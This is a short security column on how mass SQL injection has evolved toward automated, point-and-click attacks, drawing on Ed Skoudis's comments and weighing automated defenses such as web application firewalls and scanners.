Mass SQL Injection's Evolution

Mass SQL Injection is like a bad cold. It probably won't kill you, but it comes with a cough, a headache, a stuffy nose and a sore throat. It's also the next most dangerous attack vector on security guru Ed Skoudis's list. It resides there because of its evolution.

In the beginning, SQL injection involved an attacker manually crafting queries for a back-end database, injecting them through a vulnerable Web application. This attacker would send a slew of queries to determine the type of database and its structure. Then, finally, the attacker extracts or updates the data. No more.

"Now, these attacks are often accomplished using automated tools that iterate through queries, determining the database type, structure, and extracting (or updating data), all done by software with very little human interaction," Skoudis said.

So, what's next? According to Skoudis, point and click hacking of SQL databases through vulnerable Web applications. "The intelligence can be put into software that can essentially extract the database's brain with the attacker having to do little other than choose the given website to attack," added Skoudis.

As I've analyzed and reported Skoudis's attack list, I've looked closely for clues on whether the defense or offense is winning. By almost all accounts, the offense has the momentum. And the same can be said for Mass SQL Injection where the only automated security responses come with Web application firewalls with filtering capabilities and automated scanning tools that can help the good guys fix the flaws before the bad guys can find vulnerabilities in the code. These are promising solutions, but they aren't sufficient for the rapid pace of evolving attacks. A big reason the offense overshadows these promising solutions is because the attacks are more aligned and coordinated to other attacks than tools are aligned or coordinated to other tools.

"The bad guys are combining their Web app, network and wireless skills to completely dominate target organizations," said Skoudis. "If pen testers are going to keep up with the attack vectors used by bad guys, they need to combine these vectors as well."

The end goal of any Mass SQL Injection attack is to plant bots in browsers. These botnets can be used to exploit browsers, and in turn harvest credit card numbers, etc, from infected machines. Organized crime is a serious perpetrator of this kind of attack, a scary reminder just how much money and dedication is behind it. It's a war we're losing, a war that can't be won with out a lot of ingenuity and vision. In the coming weeks, I plan to seek out some of those companies or individuals who might possess those attributes. To find the right answers, we'll have to look at the wrong ones. Or, find those that are making an impact and ask why.